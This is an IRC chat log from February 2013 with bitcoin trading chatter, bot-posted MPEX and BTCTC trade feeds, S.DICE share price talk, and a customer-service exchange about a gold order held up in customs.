162ghps. Feb 20 20:47:31 pigeons runs fine on wine Feb 20 20:48:31 i can't get it installed yet Feb 20 20:49:18 Bowjob: agreed Feb 20 20:49:41 they do use some retarded contiguous space allocation scheme so be prepared for like 2 hour's worth of "allocating space" Feb 20 20:49:49 [MPEX] [S.MPOE] 1883 @ 0.0006334 = 1.1927 BTC [-] Feb 20 20:49:51 [MPEX] [S.MPOE] 4321 @ 0.00063323 = 2.7362 BTC [-] Feb 20 20:49:52 [MPEX] [S.MPOE] 1146 @ 0.00063322 = 0.7257 BTC [-] Feb 20 20:49:54 but it's sorta like btc - retardedly long to donwload, worth it. Feb 20 20:50:29 lol maybe they use blockchain for game items Feb 20 20:55:33 [MPEX] [S.MPOE] 521 @ 0.00063845 = 0.3326 BTC [+] Feb 20 20:55:35 [MPEX] [S.MPOE] 20550 @ 0.00063864 = 13.1241 BTC [+] Feb 20 20:55:36 [MPEX] [S.MPOE] 8279 @ 0.00063938 = 5.2934 BTC [+] Feb 20 20:56:15 $30.10694 Feb 20 20:56:31 haha :) Feb 20 20:56:35 not funny Feb 20 20:57:22 [MPEX] [S.DICE] 925 @ 0.00610001 = 5.6425 BTC [-] Feb 20 20:57:23 [MPEX] [S.DICE] 95 @ 0.0061 = 0.5795 BTC [-] Feb 20 20:57:25 [MPEX] [S.DICE] 1700 @ 0.00609387 = 10.3596 BTC [-] Feb 20 20:57:29 [MPEX] [S.DICE] 2050 @ 0.00604826 = 12.3989 BTC [-] Feb 20 20:57:31 [MPEX] [S.DICE] 1000 @ 0.00604806 = 6.0481 BTC [-] Feb 20 20:57:32 [MPEX] [S.DICE] 2752 @ 0.00604805 = 16.6442 BTC [-] Feb 20 20:57:34 [MPEX] [S.DICE] 36426 @ 0.0057 = 207.6282 BTC [-] Feb 20 20:57:47 the mystery of the dissappearing mircea_popescu solved Feb 20 20:57:55 im dissapearing ? Feb 20 20:58:06 dang Feb 20 20:58:15 intothe mmo Feb 20 20:58:19 someone moving a lot of SDICE lately Feb 20 20:58:41 yeah, tanking Feb 20 20:59:28 someone might just wanna cash out some BTC Feb 20 21:00:02 ;;ticker Feb 20 21:00:05 BTCUSD ticker | Best bid: 29.77001, Best ask: 29.80000, Bid-ask spread: 0.02999, Last trade: 29.77001, 24 hour volume: 45921.93342172, 24 hour low: 28.90000, 24 hour high: 29.87000, 24 hour vwap: 29.38454 Feb 20 21:00:20 100 BTC bets today on S.dice, maybe a whale need some liquidity Feb 20 21:01:05 ;;ticker Feb 20 21:01:05 BTCUSD ticker | Best bid: 29.77001, Best ask: 29.80000, Bid-ask spread: 0.02999, Last trade: 29.77001, 24 hour volume: 45905.60087843, 24 hour low: 28.90000, 24 hour high: 29.87000, 24 hour vwap: 29.38453 Feb 20 21:01:06 cmon whales, we need 10 more grand for feb Feb 20 21:01:16 mtgox.com says 30.47 Feb 20 21:01:28 go home Mt gox ur drunk Feb 20 21:01:49 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 20 21:02:17 I dont see 30.47 Feb 20 21:04:14 was in the last price bar up top Feb 20 21:04:53 gox probly controls info to manipulate prices Feb 20 21:05:05 clarmoody, goxlive, and gox always show different Feb 20 21:05:10 the s.dice action is a bit of a surprise… SD is still doing well, and it looks like the whale might even be back. I guess someone got jittery Feb 20 21:06:53 maximian may be the unwind of some other trade or w/e Feb 20 21:07:02 the evoorhes dumping didnt help Feb 20 21:07:08 yeah Feb 20 21:08:17 then theres the bot Feb 20 21:09:33 [MPEX] [S.MPOE] 3650 @ 0.00063322 = 2.3113 BTC [-] Feb 20 21:10:55 11am UTC 1`000`000 S.DICE @ 0.00639000BTC = 6`390.00000000BTC Feb 20 21:11:25 still 1M to dump Feb 20 21:12:59 [MPEX] [S.MPOE] 497 @ 0.00063322 = 0.3147 BTC [-] Feb 20 21:13:01 [MPEX] [S.MPOE] 4321 @ 0.00063227 = 2.732 BTC [-] Feb 20 21:13:03 [MPEX] [S.MPOE] 1182 @ 0.00063226 = 0.7473 BTC [-] Feb 20 21:15:02 there's an s.dice trading bot? Feb 20 21:15:31 !ticker m s;dice Feb 20 21:15:33 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Feb 20 21:15:54 !ticker m s.dice Feb 20 21:15:55 [MPEX:S.DICE] 1D: 0.0057 / 0.00635547 / 0.00674199 (1160842 shares, 7,377.70 BTC), 7D: 0.0057 / 0.00636577 / 0.0069 (1379443 shares, 8,781.22 BTC), 30D: 0.00085848 / 0.00592531 / 0.0075 (7773132 shares, 46,058.29 BTC) Feb 20 21:17:11 smickles is alive! Feb 20 21:20:24 ;;bc,stats Feb 20 21:20:26 Current Blocks: 222221 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1554 blocks | Next Difficulty In About: 1 week, 1 day, 21 hours, 7 minutes, and 11 seconds | Next Difficulty Estimate: 4235211.74448 | Estimated Percent Change: 16.00105 Feb 20 21:20:37 ;;ticker Feb 20 21:20:37 BTCUSD ticker | Best bid: 29.66002, Best ask: 29.83460, Bid-ask spread: 0.17458, Last trade: 29.66000, 24 hour volume: 45760.85528050, 24 hour low: 28.90000, 24 hour high: 29.87000, 24 hour vwap: 29.38712 Feb 20 21:21:16 !ticker m O.BTCUSD.C300T Feb 20 21:21:18 Stupid fucking white man. Feb 20 21:21:32 !ticker m O.BTCUSD.C3000T Feb 20 21:21:33 Yeah. No damn tobacco, that's for sure. Feb 20 21:21:54 we have $300 calls nao? Feb 20 21:22:55 where did you find smickles? Feb 20 21:25:40 he sent him an email.. and presumably got reply other than EOF Feb 20 21:28:19 !ticker m O.BTCUSD.C300T Feb 20 21:28:21 I prepared your canoe with cedar boughs. Feb 20 21:29:56 !ticker m O.BTCUSD.C200T Feb 20 21:29:57 [MPEX:O.BTCUSD.C200T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.21602472 / 0.21602472 / 0.21602472 (745 shares, 160.94 BTC), 30D: 0.05290351 / 0.07848145 / 0.22139121 (11732 shares, 920.74 BTC) Feb 20 21:30:02 !ticker m O.BTCUSD.C300T Feb 20 21:30:04 I haven't understood a single word you've said since I met you, not one single word. Feb 20 21:30:10 !ticker m O.BTCUSD.C290T Feb 20 21:30:11 Um, shouldn't you be with your own tribe or somethin'? Feb 20 21:30:20 !ticker m O.BTCUSD.C280T Feb 20 21:30:22 I thought I told you not to touch me. Feb 20 21:31:31 ;;slap assbot Feb 20 21:33:08 !ticker mPEX O.BTCUSD.C280T Feb 20 21:33:09 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Feb 20 21:33:22 !ticker mpex O.BTCUSD.C280T Feb 20 21:33:23 How can I be of assistance, my poor man? Feb 20 21:33:34 !ticker mpex s.bbet Feb 20 21:33:36 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00165 / 0.00193192 / 0.001965 (18005 shares, 34.78 BTC), 30D: 0.0003 / 0.00132284 / 0.001965 (126272 shares, 167.04 BTC) Feb 20 21:33:51 options are not supported i guess Feb 20 21:33:53 [MPEX] [S.MPOE] 8062 @ 0.00063447 = 5.1151 BTC [+] Feb 20 21:34:09 !ticker mpex O.BTCUSD.C200T Feb 20 21:34:10 [MPEX:O.BTCUSD.C200T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.21602472 / 0.21602472 / 0.21602472 (745 shares, 160.94 BTC), 30D: 0.05290351 / 0.07848145 / 0.22139121 (11732 shares, 920.74 BTC) Feb 20 21:34:40 ah assbot knows only about traded ones Feb 20 21:35:53 jurov must be in the api Feb 20 21:35:56 and it will be here Feb 20 21:36:42 [MPEX] [S.MPOE] 8200 @ 0.00063447 = 5.2027 BTC [+] Feb 20 21:44:39 rofl Feb 20 21:44:47 bitcoin exchange is way more centralized than forex exchange Feb 20 21:44:50 i just realized that. Feb 20 21:45:00 how? Feb 20 21:45:04 funny for a decentralized currency Feb 20 21:45:05 oh, for sure Feb 20 21:49:51 Something should be done about that. Feb 20 21:50:07 Before it manifests a problem again. Feb 20 21:50:16 Too big to fail == too big to exist Feb 20 21:55:46 selling beer for btc! Feb 20 21:57:16 ;;asks 30 Feb 20 21:57:18 There are currently 9885.7821 bitcoins offered at or under 30.0 USD, worth 296231.504653 USD in total. Feb 20 22:03:29 [MPEX] [S.MPOE] 538 @ 0.00063447 = 0.3413 BTC [+] Feb 20 22:03:31 [MPEX] [S.MPOE] 16918 @ 0.00063226 = 10.6966 BTC [-] Feb 20 22:03:32 [MPEX] [S.MPOE] 11944 @ 0.0006306 = 7.5319 BTC [-] Feb 20 22:05:57 [MPEX] [S.MPOE] 26229 @ 0.0006306 = 16.54 BTC [-] Feb 20 22:05:59 [MPEX] [S.MPOE] 17700 @ 0.00062991 = 11.1494 BTC [-] Feb 20 22:06:03 [MPEX] [S.MPOE] 10232 @ 0.00062974 = 6.4435 BTC [-] Feb 20 22:06:05 [MPEX] [S.MPOE] 13489 @ 0.0006281 = 8.4724 BTC [-] Feb 20 22:07:32 [MPEX] [S.MPOE] 1989 @ 0.0006373 = 1.2676 BTC [+] Feb 20 22:07:34 [MPEX] [S.MPOE] 4321 @ 0.00063809 = 2.7572 BTC [+] Feb 20 22:07:39 [MPEX] [S.MPOE] 4290 @ 0.0006384 = 2.7387 BTC [+] Feb 20 22:08:52 [MPEX] [S.MPOE] 4321 @ 0.00063836 = 2.7584 BTC [-] Feb 20 22:08:54 [MPEX] [S.MPOE] 15668 @ 0.0006384 = 10.0025 BTC [+] Feb 20 22:09:05 satoshidice.com profit for the day = 1106 Feb 20 22:09:57 nice Feb 20 22:10:28 pace for the month is 14000 Feb 20 22:10:34 10090 BTC profit so far this month Feb 20 22:10:59 but a whale can bump that very quickly Feb 20 22:11:10 or drop it :) Feb 20 22:11:22 its quite disturbing how some people manage to stay employed Feb 20 22:12:05 Whale whale whale! Feb 20 22:13:01 hr/finance type girl sends note at 3:30pm that due to system migration all time accounting/expenses must be forecast for the coming month and entered before 5pm Feb 20 22:13:39 whale got a big mouthful of krill and is ready for action Feb 20 22:15:02 dub that's fucking great! Feb 20 22:15:08 an afternoon of planning! Feb 20 22:15:24 except this was yesterday and I had teh afternoon off Feb 20 22:15:53 that and I'm far too busy for this shit at the best of times Feb 20 22:17:40 and of course while we knew this migration was coming many months ago, we give 1.5 hours notice Feb 20 22:18:56 jurov untraded ones aren't listed at all in the json Feb 20 22:19:17 in dubcorp heavy industries someone would be fired so quickly their skin would possibly remain in the office Feb 20 22:19:21 dub, classic. Feb 20 22:19:52 dub no, the other way around : fire just their clothes. Feb 20 22:23:14 [MPEX] [S.MPOE] 4321 @ 0.00062868 = 2.7165 BTC [-] Feb 20 22:23:15 [MPEX] [S.MPOE] 7764 @ 0.00062861 = 4.8805 BTC [-] Feb 20 22:29:11 At DeadCorp you would be fired.... out of a cannon, into the Sun. Feb 20 22:29:59 [MPEX] [S.MPOE] 4321 @ 0.00062889 = 2.7174 BTC [+] Feb 20 22:30:01 [MPEX] [S.MPOE] 12236 @ 0.00062861 = 7.6917 BTC [-] Feb 20 22:30:03 [MPEX] [S.MPOE] 4147 @ 0.0006281 = 2.6047 BTC [-] Feb 20 22:37:50 ;;ticker Feb 20 22:37:50 BTCUSD ticker | Best bid: 29.78000, Best ask: 29.86999, Bid-ask spread: 0.08999, Last trade: 29.87000, 24 hour volume: 43817.96776925, 24 hour low: 28.90000, 24 hour high: 29.87035, 24 hour vwap: 29.39686 Feb 20 22:38:30 Lol Feb 20 22:38:31 BTC-e is having their own civil war.. NVC vs LTC Feb 20 22:38:49 ltc as lol the coin Feb 20 22:39:24 and nvc as NeVermind coin Feb 20 22:39:34 fight! Feb 20 22:39:44 :3 Feb 20 22:39:45 I joined in I told them buy Solid coins Feb 20 22:39:51 good Feb 20 22:40:35 mhm I got dc ?? Feb 20 22:41:48 what's nvc? Feb 20 22:42:09 another alt Feb 20 22:42:13 with pre mine Feb 20 22:45:28 nvc? Feb 20 22:45:42 oh nm Feb 20 22:46:57 [MPEX] [S.MPOE] 4264 @ 0.0006281 = 2.6782 BTC [-] Feb 20 22:46:59 [MPEX] [S.MPOE] 2098 @ 0.000628 = 1.3175 BTC [-] Feb 20 22:47:01 [MPEX] [S.MPOE] 11488 @ 0.00062799 = 7.2143 BTC [-] Feb 20 22:47:19 hmm wonder if my peepeecoins are worth anything yet Feb 20 22:49:06 nope Feb 20 22:49:35 topace: aren't you the guy i've been continually calling/emailing with over the last week to get your package cleared? Feb 20 22:49:59 send it to me instead coingenuity Feb 20 22:50:03 he doesn't want it Feb 20 22:50:06 (your invoice is in proper customs format, with correct descriptions, but your local customs office is being a pain - not our fault, and we've been working with them to clear your package) Feb 20 22:50:17 so saying "no proper description" is not very accurate at all Feb 20 22:51:01 jcpham: i'm kind of sick of the shitty attitude people have, it's really starting to bother me Feb 20 22:51:16 anyway, AFK for another 20 hour work day- your package went out this AM jcpham Feb 20 22:51:19 dawwww hugs for coingenuity Feb 20 22:51:29 ty! Feb 20 22:51:51 well, frankly, over the last week people have been goddamn obnoxious and it's driving me rather nuts Feb 20 22:52:02 "this is why we can't have nice things" Feb 20 22:52:25 anyway, you're welcome, my pleasure - you're a lovely client and an awesome dude Feb 20 22:56:46 jcpham is all about having his package handled by coingenuity Feb 20 22:57:03 fra-gee-lay Feb 20 22:57:09 dub: i handle packages like a pro Feb 20 22:57:11 :D Feb 20 22:57:32 true story, i can handle 20 packages in less than an hour lololol Feb 20 22:58:28 coingenuity: why haven't I gotten a confirmation for my purchase yesterday? Feb 20 22:58:35 WHy haven't you responded to support emails? Feb 20 22:58:48 Or twitter, or bitcointalk.org? Feb 20 22:59:05 coingenuity: no thtas my roommate :p Feb 20 22:59:33 you run a business, if you can't run it right, expect to be driven nuts Feb 20 22:59:39 deadweasel: you were pinging us in the middle of the night, send my support staff an email Feb 20 22:59:48 I did. Feb 20 22:59:52 contact@coinabul.com << emailed us directly? Feb 20 23:00:17 yes Feb 20 23:00:35 anyway, for your confirmation email- sometimes our confirmation emails get black-holed by spam filters(quite common) Feb 20 23:00:38 what's your order number? Feb 20 23:00:46 200000443 Feb 20 23:00:48 coingenuity: i was only relaying what the customs office told my roommate.. that the description wasnt sufficient. Feb 20 23:00:54 coingenuity: what business? Feb 20 23:01:08 stupid customs Feb 20 23:01:16 5 pamp 50gr bars, confirmed... going out in the next batch of shipping on Thursday Feb 20 23:01:42 right, coingenuity, you should have an email sent for confirmation of purchase and then when you know shipping date. Feb 20 23:01:45 [MPEX] [S.MPOE] 4321 @ 0.00063705 = 2.7527 BTC [+] Feb 20 23:01:45 it looks as if that order is a day or two old, but it's going out Thursday :P Feb 20 23:01:46 [MPEX] [S.MPOE] 20979 @ 0.0006373 = 13.3699 BTC [+] Feb 20 23:01:56 there is far too much money at stake ot not let customer know what hte status is Feb 20 23:02:04 deadweasel: we send out emails for each status change, but they get black holed by spam filters Feb 20 23:02:13 depending on the recipient email provider Feb 20 23:02:16 Well, fix your sys admin Feb 20 23:02:21 gmail>? Feb 20 23:02:32 yeah, gmail is our biggest email-delivery headache Feb 20 23:02:50 then find another way to send, don't use a blacklisted server Feb 20 23:03:11 topace: that's not correct, it's your local customs office being a pain, unfortunately- either way, we're working with them quite closely to force the package through without VAT taxes Feb 20 23:03:38 topace: we mark very clearly VAT EXEMPT INVESTMENT on our invoices but the local customs office to you finds that insufficient for VAT exemption Feb 20 23:04:01 so i'm giving them more detail to ensure they don't charge import tax... Feb 20 23:04:15 also, nothing in my spam filter. Feb 20 23:04:22 but thanks for checking on my order. Feb 20 23:04:35 deadweasel: i believe it's a combination of "gold" and "purchase" which causes us to get blacklisted by various providers... i've been working on it for quite a while, actually Feb 20 23:04:51 something about my order emails causes spam filters to absolutely panic Feb 20 23:05:04 and, np Feb 20 23:06:08 coingenuity: cool thanks, ill let my roommate know too, though im sure you've alreayd been talking to him.. he said he emailed and phoned you a few times Feb 20 23:06:57 topace: yeah, i'm the one he talked to on the phone... been working extensively to clear his package through customs with no tax Feb 20 23:07:00 anyway, i'm off to start my work-day, unless yall need anything else? Feb 20 23:07:29 No, thank you Feb 20 23:07:42 sincerely Feb 20 23:07:49 np bud Feb 20 23:07:56 btw, just so i know Feb 20 23:08:02 when did you send an email to contact@coinabul.com ? Feb 20 23:08:22 i am guessing it was just a couple hours ago, right? Feb 20 23:08:24 5 hours ago.. 7 hours ago to jon@coinabul.com from the btctalk thread Feb 20 23:08:47 if I had a confirmation email I wouldn't have wigged out Feb 20 23:08:52 ah, yeah, no wonder you didnt hear anything back - that's like 4AM our time Feb 20 23:08:55 too much$$ not to wig when using BTC Feb 20 23:09:22 get an AUTORESPONDER, that says we got your message, it is XXAM our time, will get back to you shortly, here isyour ticket number. Feb 20 23:09:29 there are open source solutions Feb 20 23:09:32 easy to setup Feb 20 23:09:42 makes your customers happy Feb 20 23:09:45 placebos are great Feb 20 23:09:47 use them Feb 20 23:09:48 [MPEX] [S.MPOE] 4321 @ 0.00062807 = 2.7139 BTC [-] Feb 20 23:09:49 thanks again Feb 20 23:09:50 [MPEX] [S.MPOE] 9849 @ 0.00062799 = 6.1851 BTC [-] Feb 20 23:09:54 [MPEX] [S.MPOE] 4834 @ 0.00062798 = 3.0357 BTC [-] Feb 20 23:10:06 np, have a good one Feb 20 23:10:56 [MPEX] [S.MPOE] 4321 @ 0.00062886 = 2.7173 BTC [+] Feb 20 23:10:58 [MPEX] [S.MPOE] 3879 @ 0.00062915 = 2.4405 BTC [+] Feb 20 23:11:15 BTC-e is having their own civil war.. NVC vs LTC <<< drama. backs titcoins! Feb 20 23:16:29 [MPEX] [S.MPOE] 4321 @ 0.00062815 = 2.7142 BTC [-] Feb 20 23:16:30 [MPEX] [S.MPOE] 20929 @ 0.00062798 = 13.143 BTC [-] Feb 20 23:24:59 jurov: are you facilitating mpex deposits < 10 btc? Feb 20 23:25:15 yes, can be Feb 20 23:26:28 but the fee is 0.1btc (if done outside coinbr) Feb 20 23:27:45 ok Feb 20 23:29:49 well, do you want to? or later? Feb 20 23:31:18 jurov: later maybe, will contact you if; my 0.8 bitcoin client still indexing a while :) Feb 20 23:35:52 [MPEX] [S.MPOE] 4321 @ 0.00062914 = 2.7185 BTC [+] Feb 20 23:35:54 [MPEX] [S.MPOE] 10671 @ 0.00062915 = 6.7137 BTC [+] Feb 20 23:40:16 ;;ticker Feb 20 23:40:18 BTCUSD ticker | Best bid: 29.60004, Best ask: 29.80897, Bid-ask spread: 0.20893, Last trade: 29.80897, 24 hour volume: 41976.69324376, 24 hour low: 28.90000, 24 hour high: 29.87035, 24 hour vwap: 29.42177 Feb 20 23:40:32 !ticker m sdice Feb 20 23:40:33 How can I be of assistance, my poor man? Feb 20 23:40:38 !ticker m s.dice Feb 20 23:40:40 [MPEX:S.DICE] 1D: 0.0057 / 0.0063548 / 0.00673999 (1158842 shares, 7,364.22 BTC), 7D: 0.0057 / 0.00636577 / 0.0069 (1379443 shares, 8,781.22 BTC), 30D: 0.00085848 / 0.00592531 / 0.0075 (7773132 shares, 46,058.29 BTC) Feb 20 23:40:56 !ticker h sdice Feb 20 23:40:58 [HAVELOCK:SDICE] 1D: 0.66000000 / 0.67348406 / 0.74399999 (438 shares, 294.98601767 BTC), 7D: 0.66000000 / 0.70456134 / 0.75900000 (1412 shares, 994.84061851 BTC), 30D: 0.44000000 / 0.65995542 / 0.89000000 (11423 shares, 7538.67078313 BTC) Feb 20 23:45:03 [MPEX] [S.MPOE] 4321 @ 0.00062803 = 2.7137 BTC [-] Feb 20 23:45:04 [MPEX] [S.MPOE] 20779 @ 0.00062798 = 13.0488 BTC [-] Feb 20 23:46:49 [MPEX] [S.MPOE] 7471 @ 0.00062798 = 4.6916 BTC [-] Feb 20 23:46:51 [MPEX] [S.MPOE] 29 @ 0.00062768 = 0.0182 BTC [-] Feb 20 23:51:24 [MPEX] [S.MPOE] 4321 @ 0.0006288 = 2.717 BTC [+] Feb 20 23:51:26 [MPEX] [S.MPOE] 7050 @ 0.00062915 = 4.4355 BTC [+] Feb 20 23:51:28 [MPEX] [S.MPOE] 6623 @ 0.0006373 = 4.2208 BTC [+] Feb 20 23:51:29 [MPEX] [S.MPOE] 2456 @ 0.0006384 = 1.5679 BTC [+] Feb 21 00:00:47 [MPEX] [S.MPOE] 1336 @ 0.0006384 = 0.8529 BTC [+] Feb 21 00:00:49 [MPEX] [S.MPOE] 4321 @ 0.0006387 = 2.7598 BTC [+] Feb 21 00:00:51 [MPEX] [S.MPOE] 16843 @ 0.00063871 = 10.7578 BTC [+] Feb 21 00:09:29 [HAVELOCK] [SDICE] 1 @ 0.718 BTC [+] Feb 21 00:14:50 [BTCTC] [S.MPOE-PT] 6 @ 0.00065 = 0.0039 BTC [-] Feb 21 00:14:52 [MPEX] [S.MPOE] 4736 @ 0.00062768 = 2.9727 BTC [-] Feb 21 00:14:54 [MPEX] [S.MPOE] 2414 @ 0.00062761 = 1.5151 BTC [-] Feb 21 00:21:11 [MPEX] [S.MPOE] 4321 @ 0.00063223 = 2.7319 BTC [+] Feb 21 00:21:13 [MPEX] [S.MPOE] 1497 @ 0.00063255 = 0.9469 BTC [+] Feb 21 00:22:36 [MPEX] [S.MPOE] 1907 @ 0.00062761 = 1.1969 BTC [-] Feb 21 00:22:38 [MPEX] [S.MPOE] 1402 @ 0.0006276 = 0.8799 BTC [-] Feb 21 00:24:41 [MPEX] [S.MPOE] 4321 @ 0.0006278 = 2.7127 BTC [+] Feb 21 00:24:44 [MPEX] [S.MPOE] 4321 @ 0.00062768 = 2.7122 BTC [-] Feb 21 00:24:45 [MPEX] [S.MPOE] 9116 @ 0.0006276 = 5.7212 BTC [-] Feb 21 00:24:48 [MPEX] [S.MPOE] 10242 @ 0.00062686 = 6.4203 BTC [-] Feb 21 00:26:32 allo? Feb 21 00:26:40 ;;slap gribble Feb 21 00:31:58 [MPEX] [S.MPOE] 4321 @ 0.00063227 = 2.732 BTC [+] Feb 21 00:32:00 [MPEX] [S.MPOE] 9705 @ 0.00063255 = 6.1389 BTC [+] Feb 21 00:34:57 interesting why mpoe buys options for 0.32184551 that can be exercised for 0.32088285 (C200T) Feb 21 00:35:03 [MPEX] [S.MPOE] 2879 @ 0.00063255 = 1.8211 BTC [+] Feb 21 00:35:05 [MPEX] [S.MPOE] 4321 @ 0.0006387 = 2.7598 BTC [+] Feb 21 00:35:07 [MPEX] [S.MPOE] 11727 @ 0.00063871 = 7.4902 BTC [+] Feb 21 00:35:09 [MPEX] [S.MPOE] 9873 @ 0.00063938 = 6.3126 BTC [+] Feb 21 00:35:53 almost exactly 1% difference Feb 21 00:37:24 C250T the same...1.003% Feb 21 00:38:00 [MPEX] [O.BTCUSD.C200T] 1 @ 0.32184551 BTC [+] Feb 21 00:38:16 dunno. so today i sell instead of exercising Feb 21 00:40:53 ;;bc,stats Feb 21 00:40:55 Current Blocks: 222256 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1519 blocks | Next Difficulty In About: 1 week, 1 day, 0 hours, 53 minutes, and 20 seconds | Next Difficulty Estimate: 4328515.3873 | Estimated Percent Change: 18.5566 Feb 21 00:42:08 ;;calc 0.08-0.03651011 Feb 21 00:42:08 0.04348989 Feb 21 00:44:45 [MPEX] [S.MPOE] 500 @ 0.00063933 = 0.3197 BTC [-] Feb 21 00:46:07 [MPEX] [S.MPOE] 3821 @ 0.00063933 = 2.4429 BTC [-] Feb 21 00:46:09 [MPEX] [S.MPOE] 6479 @ 0.00063938 = 4.1425 BTC [+] Feb 21 00:47:54 [MPEX] [S.DICE] 1000 @ 0.00570001 = 5.7 BTC [+] Feb 21 00:47:55 [MPEX] [S.DICE] 3574 @ 0.0057 = 20.3718 BTC [-] Feb 21 00:57:29 ;;ticker Feb 21 00:57:30 BTCUSD ticker | Best bid: 29.65101, Best ask: 29.70940, Bid-ask spread: 0.05839, Last trade: 29.70940, 24 hour volume: 38746.04227983, 24 hour low: 28.98839, 24 hour high: 29.87035, 24 hour vwap: 29.46022 Feb 21 00:57:36 35 more cents come on Feb 21 01:00:36 [MPEX] [S.MPOE] 12550 @ 0.00063686 = 7.9926 BTC [-] Feb 21 01:04:58 I further reduced the price on SatoshiDice shares on BTCT.co Feb 21 01:09:09 [MPEX] [S.MPOE] 4321 @ 0.0006331 = 2.7356 BTC [-] Feb 21 01:09:11 [MPEX] [S.MPOE] 37179 @ 0.00063278 = 23.5261 BTC [-] Feb 21 01:27:11 [MPEX] [S.MPOE] 4321 @ 0.0006335 = 2.7374 BTC [+] Feb 21 01:27:16 [MPEX] [S.MPOE] 15379 @ 0.00063354 = 9.7432 BTC [+] Feb 21 01:33:27 [MPEX] [S.MPOE] 4321 @ 0.00063282 = 2.7344 BTC [-] Feb 21 01:33:28 [MPEX] [S.MPOE] 10429 @ 0.00063278 = 6.5993 BTC [-] Feb 21 01:35:26 s.dice income goes up, share price goes down - you can't explain that Feb 21 01:35:38 nope Feb 21 01:37:00 eh. Still had to reduce price on my passthrough Feb 21 01:37:36 people cashing out of btc instead of buying the shares Feb 21 01:38:15 lol, just today i sold 10btc to someone who wanted to buy asicminer Feb 21 01:40:08 hm... unless ukto appears, it looks i'll have to postpone CoinBr.iDiff-E liquidation Feb 21 01:41:53 while i can pay it out, someone can sell it subsequently and cash out twice - what would be unfair to buyer Feb 21 01:43:05 [MPEX] [S.MPOE] 2548 @ 0.00063278 = 1.6123 BTC [-] Feb 21 01:43:07 [MPEX] [S.MPOE] 4321 @ 0.00063147 = 2.7286 BTC [-] Feb 21 01:43:10 [MPEX] [S.MPOE] 4100 @ 0.00063146 = 2.589 BTC [-] Feb 21 01:43:12 [MPEX] [S.MPOE] 19931 @ 0.0006285 = 12.5266 BTC [-] Feb 21 01:47:45 [MPEX] [S.MPOE] 4321 @ 0.00063347 = 2.7372 BTC [+] Feb 21 01:47:46 [MPEX] [S.MPOE] 8921 @ 0.00063354 = 5.6518 BTC [+] Feb 21 01:47:48 [MPEX] [S.MPOE] 4658 @ 0.00063686 = 2.9665 BTC [+] Feb 21 01:49:21 hi all Feb 21 01:49:22 Ps4 being announced! Feb 21 01:49:30 nice Feb 21 01:49:36 did i miss any major news? Feb 21 01:54:25 what's the news? Feb 21 01:56:02 yes i heard Feb 21 01:56:21 suprised i haven't seen $30 yet, but that is expected Feb 21 01:56:30 any S.DICE news? Feb 21 01:56:52 showing the high as 29.87035 Feb 21 01:57:19 from mt. gox or a smaller exchange Feb 21 01:57:30 hold on i'm gonna check the vwap Feb 21 01:57:45 [BTCTC] [B.YABMC] 1 @ 0.0079 BTC [+] Feb 21 01:57:47 [BTCTC] [B.YABMC] 2 @ 0.00733 = 0.0147 BTC [-] Feb 21 01:57:49 [BTCTC] [B.YABMC] 2 @ 0.00732 = 0.0146 BTC [-] Feb 21 01:57:51 [BTCTC] [B.YABMC] 27 @ 0.00731 = 0.1974 BTC [-] Feb 21 01:57:52 [BTCTC] [B.YABMC] 10 @ 0.00731 = 0.0731 BTC [-] Feb 21 01:57:54 [BTCTC] [B.YABMC] 8 @ 0.00502 = 0.0402 BTC [-] Feb 21 01:58:10 jurov around? Feb 21 01:58:17 yes Feb 21 01:58:24 how are you? Feb 21 01:58:37 sleepy Feb 21 01:59:02 lol, just moved more btc in, if you have a chance, have some orders to place Feb 21 01:59:33 also, when i exercise option tomorrow or friday Feb 21 01:59:44 do i lock in the price of my exercise? Feb 21 01:59:54 or is that subject to the exercise being sent to mpex Feb 21 02:00:09 [MPEX] [S.MPOE] 4321 @ 0.00063247 = 2.7329 BTC [-] Feb 21 02:00:11 [MPEX] [S.MPOE] 4745 @ 0.00063229 = 3.0002 BTC [-] Feb 21 02:02:37 the exercise is sent to mpex immediately Feb 21 02:02:55 and you'll receive btc based on current vwap Feb 21 02:03:07 business done. Feb 21 02:05:04 fortunately mpex includes all pertinent information in exercise reply so it could be done automatically easily Feb 21 02:05:18 [MPEX] [S.MPOE] 14555 @ 0.00063229 = 9.203 BTC [-] Feb 21 02:05:19 [MPEX] [S.MPOE] 3578 @ 0.0006285 = 2.2488 BTC [-] Feb 21 02:05:37 thanks jurov Feb 21 02:05:40 that is awesome Feb 21 02:05:50 i have to say your brokerage is so nice to use Feb 21 02:07:21 glad to hear Feb 21 02:07:39 [MPEX] [S.DICE] 800 @ 0.00562961 = 4.5037 BTC [-] Feb 21 02:12:50 it has to be, i'm eating own dogfood Feb 21 02:15:24 anyway, why nobody sets tx fees? at least something like 0.00001 Feb 21 02:15:44 then they come and demand deposit to be processed Feb 21 02:24:11 i agree jurov, i think the problem is not being provided advanced settings when making TXNs Feb 21 02:24:16 in most wallets Feb 21 02:24:24 it's a preference, not a per txn setting Feb 21 02:24:43 and that is a pain to change, so rather than spend 30 seconds changing, they wait 10 minutes for first inclusion, or longer Feb 21 02:27:54 okay, accepted all, confirmed or unconfirmed Feb 21 02:28:20 if anyone asks about CoinBr.iDiff-E , send them after ukto Feb 21 02:28:27 i'm off Feb 21 02:28:30 cya Feb 21 02:28:31 [BTCTC] [GSDPT] 1000 @ 0.006 = 6 BTC [-] Feb 21 02:29:54 [BTCTC] [S.DICE-PT] 2 @ 0.00602 = 0.012 BTC [-] Feb 21 02:29:56 [BTCTC] [S.DICE-PT] 1048 @ 0.006 = 6.288 BTC [-] Feb 21 02:32:14 usagi Feb 21 02:32:56 sorry jurov Feb 21 02:33:05 yeah, i am transferring from exchange, so i can't set TX fees Feb 21 02:33:29 [BTCTC] [GSDPT] 6 @ 0.00623 = 0.0374 BTC [+] Feb 21 02:34:06 [MPEX] [S.DICE] 800 @ 0.00608 = 4.864 BTC [+] Feb 21 02:34:08 [MPEX] [S.DICE] 500 @ 0.00609 = 3.045 BTC [+] Feb 21 02:52:13 [MPEX] 